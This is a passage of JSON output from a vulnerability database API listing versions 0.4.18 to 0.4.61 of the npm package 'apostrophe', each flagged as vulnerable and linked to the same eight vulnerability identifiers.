y-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.18"},{"url":"http://public2.vulnerablecode.io/api/packages/267864?format=json","purl":"pkg:npm/apostrophe@0.4.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.19"},{"url":"http://public2.vulnerablecode.io/api/packages/267866?format=json","purl":"pkg:npm/apostrophe@0.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.20"},{"url":"http://public2.vulnerablecode.io/api/packages/267868?format=json","purl":"pkg:npm/apostrophe@0.4.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.21"},{"url":"http://public2.vulnerablecode.io/api/packages/267870?format=json","purl":"pkg:npm/apostrophe@0.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.22"},{"url":"http://public2.vulnerablecode.io/api/packages/267872?format=json","purl":"pkg:npm/apostrophe@0.4.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.23"},{"url":"http://public2.vulnerablecode.io/api/packages/267874?format=json","purl":"pkg:npm/apostrophe@0.4.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.24"},{"url":"http://public2.vulnerablecode.io/api/packages/267876?format=json","purl":"pkg:npm/apostrophe@0.4.25","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.25"},{"url":"http://public2.vulnerablecode.io/api/packages/267878?format=json","purl":"pkg:npm/apostrophe@0.4.26","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.26"},{"url":"http://public2.vulnerablecode.io/api/packages/267880?format=json","purl":"pkg:npm/apostrophe@0.4.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.27"},{"url":"http://public2.vulnerablecode.io/api/packages/267882?format=json","purl":"pkg:npm/apostrophe@0.4.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.28"},{"url":"http://public2.vulnerablecode.io/api/packages/267883?format=json","purl":"pkg:npm/apostrophe@0.4.29","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.29"},{"url":"http://public2.vulnerablecode.io/api/packages/267884?format=json","purl":"pkg:npm/apostrophe@0.4.30","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.30"},{"url":"http://public2.vulnerablecode.io/api/packages/267885?format=json","purl":"pkg:npm/apostrophe@0.4.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.31"},{"url":"http://public2.vulnerablecode.io/api/packages/267886?format=json","purl":"pkg:npm/apostrophe@0.4.32","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.32"},{"url":"http://public2.vulnerablecode.io/api/packages/267887?format=json","purl":"pkg:npm/apostrophe@0.4.33","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.33"},{"url":"http://public2.vulnerablecode.io/api/packages/267888?format=json","purl":"pkg:npm/apostrophe@0.4.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.34"},{"url":"http://public2.vulnerablecode.io/api/packages/267889?format=json","purl":"pkg:npm/apostrophe@0.4.35","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.35"},{"url":"http://public2.vulnerablecode.io/api/packages/267890?format=json","purl":"pkg:npm/apostrophe@0.4.36","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.36"},{"url":"http://public2.vulnerablecode.io/api/packages/267891?format=json","purl":"pkg:npm/apostrophe@0.4.37","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.37"},{"url":"http://public2.vulnerablecode.io/api/packages/267892?format=json","purl":"pkg:npm/apostrophe@0.4.38","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.38"},{"url":"http://public2.vulnerablecode.io/api/packages/267893?format=json","purl":"pkg:npm/apostrophe@0.4.39","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.39"},{"url":"http://public2.vulnerablecode.io/api/packages/267894?format=json","purl":"pkg:npm/apostrophe@0.4.40","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.40"},{"url":"http://public2.vulnerablecode.io/api/packages/267895?format=json","purl":"pkg:npm/apostrophe@0.4.41","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.41"},{"url":"http://public2.vulnerablecode.io/api/packages/267896?format=json","purl":"pkg:npm/apostrophe@0.4.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.42"},{"url":"http://public2.vulnerablecode.io/api/packages/267897?format=json","purl":"pkg:npm/apostrophe@0.4.43","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.43"},{"url":"http://public2.vulnerablecode.io/api/packages/267898?format=json","purl":"pkg:npm/apostrophe@0.4.44","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.44"},{"url":"http://public2.vulnerablecode.io/api/packages/267899?format=json","purl":"pkg:npm/apostrophe@0.4.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.45"},{"url":"http://public2.vulnerablecode.io/api/packages/267900?format=json","purl":"pkg:npm/apostrophe@0.4.46","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.46"},{"url":"http://public2.vulnerablecode.io/api/packages/267901?format=json","purl":"pkg:npm/apostrophe@0.4.47","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.47"},{"url":"http://public2.vulnerablecode.io/api/packages/267902?format=json","purl":"pkg:npm/apostrophe@0.4.48","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.48"},{"url":"http://public2.vulnerablecode.io/api/packages/267903?format=json","purl":"pkg:npm/apostrophe@0.4.49","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.49"},{"url":"http://public2.vulnerablecode.io/api/packages/267904?format=json","purl":"pkg:npm/apostrophe@0.4.50","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.50"},{"url":"http://public2.vulnerablecode.io/api/packages/267905?format=json","purl":"pkg:npm/apostrophe@0.4.51","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.51"},{"url":"http://public2.vulnerablecode.io/api/packages/267906?format=json","purl":"pkg:npm/apostrophe@0.4.52","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.52"},{"url":"http://public2.vulnerablecode.io/api/packages/267907?format=json","purl":"pkg:npm/apostrophe@0.4.53","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.53"},{"url":"http://public2.vulnerablecode.io/api/packages/267908?format=json","purl":"pkg:npm/apostrophe@0.4.54","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.54"},{"url":"http://public2.vulnerablecode.io/api/packages/267909?format=json","purl":"pkg:npm/apostrophe@0.4.55","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.55"},{"url":"http://public2.vulnerablecode.io/api/packages/267910?format=json","purl":"pkg:npm/apostrophe@0.4.56","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.56"},{"url":"http://public2.vulnerablecode.io/api/packages/267911?format=json","purl":"pkg:npm/apostrophe@0.4.57","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.57"},{"url":"http://public2.vulnerablecode.io/api/packages/267912?format=json","purl":"pkg:npm/apostrophe@0.4.58","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.58"},{"url":"http://public2.vulnerablecode.io/api/packages/267913?format=json","purl":"pkg:npm/apostrophe@0.4.59","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.59"},{"url":"http://public2.vulnerablecode.io/api/packages/267914?format=json","purl":"pkg:npm/apostrophe@0.4.60","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.60"},{"url":"http://public2.vulnerablecode.io/api/packages/267915?format=json","purl":"pkg:npm/apostrophe@0.4.61","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulne